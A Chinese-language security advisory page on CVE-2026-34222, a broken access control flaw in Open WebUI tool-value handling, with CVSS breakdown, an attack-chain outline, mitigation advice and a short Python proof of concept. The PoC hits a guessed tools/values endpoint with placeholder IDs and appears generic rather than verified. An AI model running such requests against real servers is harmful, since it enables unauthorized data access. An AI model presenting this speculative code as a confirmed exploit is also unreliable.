CVE-2026-34222 CVSS 7.7 高危

CVE-2026-34222 Open WebUI访问控制失效漏洞

披露日期: 2026-04-01

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34222

漏洞类型

访问控制失效

CVSS评分

7.7 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Open WebUI

漏洞概述

Open WebUI是一个旨在完全离线运行的自托管人工智能平台。在0.8.11版本之前，该平台在工具值处理机制中存在一个失效的访问控制漏洞。该漏洞允许低权限攻击者在无需用户交互的情况下，通过网络利用此缺陷，导致机密性受到严重影响。攻击者可能利用此漏洞越权访问敏感数据。该问题已在0.8.11版本中得到修复。

技术细节

该漏洞属于失效的访问控制类别，具体影响Open WebUI中“工具值”的处理逻辑。根据CVSS向量分析，攻击者只需具备低权限账号（PR:L）即可触发漏洞，且无需用户交互（UI:N），攻击复杂度低（AC:L）。漏洞的根本原因在于服务器端未对请求中的工具值参数进行严格的权限校验，导致攻击者能够通过网络（AV:N）绕过原本的权限限制。由于作用域发生了变化（S:C），攻击者的权限可能从用户态扩展到管理员态或其他用户的上下文中。利用该漏洞时，攻击者可以构造特定的恶意请求，通过修改工具值参数来访问本应受保护的敏感资源。尽管该漏洞不影响系统的完整性和可用性，但其对机密性的高影响（C:H）意味着攻击者能够读取敏感信息，导致严重的数据泄露风险。

攻击链分析

STEP 1

侦察

攻击者识别出目标运行的是Open WebUI，且版本低于0.8.11。

STEP 2

获取初始访问

攻击者注册或使用一个现有的低权限用户账号登录系统。

STEP 3

漏洞利用

攻击者向工具值相关的API端点发送特制的网络请求，绕过访问控制检查。

STEP 4

数据泄露

由于作用域改变（S:C）和高机密性影响（C:H），攻击者成功读取本应受限的敏感工具值或用户数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (example)
target_url = "http://target-open-webui/api/tools/values"

# Attacker's low-privilege token
headers = {
    "Authorization": "Bearer LOW_PRIVILEGE_TOKEN",
    "Content-Type": "application/json"
}

# Payload attempting to access protected tool values
payload = {
    "tool_id": "admin_sensitive_tool",
    "value_id": "target_sensitive_data"
}

try:
    # Send request to exploit broken access control
    response = requests.get(target_url, headers=headers, json=payload, timeout=10)
    
    if response.status_code == 200:
        print("[+] Exploit successful! Data leaked:")
        print(response.text)
    else:
        print("[-] Exploit failed or patched.")
        
except Exception as e:
    print(f"Error: {e}")

影响范围

Open WebUI < 0.8.11

防御指南

临时缓解措施

建议立即将Open WebUI升级至0.8.11版本以修复此漏洞。如果无法立即升级，应严格限制对Open WebUI服务的网络访问，仅允许可信IP连接，并加强对用户权限的审计，监控是否存在针对工具值接口的异常访问请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表